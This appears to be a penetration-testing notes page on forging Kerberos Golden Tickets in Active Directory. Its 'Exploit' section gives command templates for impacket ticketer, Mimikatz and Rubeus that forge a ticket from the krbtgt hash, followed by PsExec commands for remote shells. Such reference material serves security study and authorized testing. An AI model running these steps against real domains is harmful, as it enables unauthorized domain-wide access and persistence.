# Golden Tickets

A Golden Ticket is a Ticket Granting Ticket (TGT) for the *krbtgt* domain account, the service account for the Key Distribution Center. This special TGT can be used to obtain a Service Ticket for any service on the network.

The password (more commonly NTLM hash) for the *krbtgt* account is required to obtain the TGT/Golden Ticket. This is often obtained through a [DCSync](https://stuff.weelee.zip/network/on-prem-active-directory/credential-hunting/ntds.dit/dcsync) attack once you get domain administrator privileges or similar.

{% hint style="info" %}
The Golden Ticket can be a means of persistence on the network since, by default, the password for the *krbtgt* account does not change.
{% endhint %}

## Exploit

{% tabs %}
{% tab title="impacket-ticketer" %}
{% embed url="<https://github.com/fortra/impacket>" %}

{% code title="Linux (Attacker)" %}

```fish
## Create a Golden Ticket Using the NT Hash of the krbtgt Account
ticketer.py -nthash [krbtgt nt hash] -domain-sid [domain sid] -domain [domain] krbtgt

## Set Obtained .ccache to Kerberos Credential Cache
export KRB5CCNAME=[path to .ccache]

## Use Your Exec Tool of Choice to Access Your Specific Service
psexec.py [domain]/krbtgt@[computer] -k -no-pass
```

{% endcode %}
{% endtab %}

{% tab title="Mimikatz" %}

{% embed url="<https://github.com/gentilkiwi/mimikatz>" %}

{% code title="Windows (Target)" %}

```powershell
## Run Mimikatz.exe
Mimikatz.exe

## Create Golden Ticket And Inject The Ticket Into The Current Process
kerberos::golden /domain:weelee.zip /sid:[domain sid] /rc4:[krbtgt nt hash] /user:weelee /ptt

## Use Your Exec Tool Of Choice To Access Whatever Service You Want
PSexec.exe -accepteula \\computer.weelee.zip cmd
```

{% endcode %}

{% hint style="info" %}
The `/rc4` flag can be replaced with `/aes128` or `/aes256` if the provided password is in a different encryption format.
{% endhint %}
{% endtab %}

{% tab title="Rubeus" %}
{% embed url="<https://github.com/GhostPack/Rubeus>" %}

{% code title="Windows (Target)" %}

```powershell
## Create A Golden Ticket And Inject It Into The Current Process
Rubeus.exe golden /rc4:[nt hash] /user:weelee /ldap /ptt

## Use Your Exec Tool Of Choice To Access Whatever Service You Want
PSexec.exe -accepteula \\computer.weelee.zip cmd
```

{% endcode %}

{% hint style="info" %}
The `/rc4` flag can be replaced with `/aes128` or `/aes256` if the provided password is in a different encryption format.
{% endhint %}
{% endtab %}
{% endtabs %}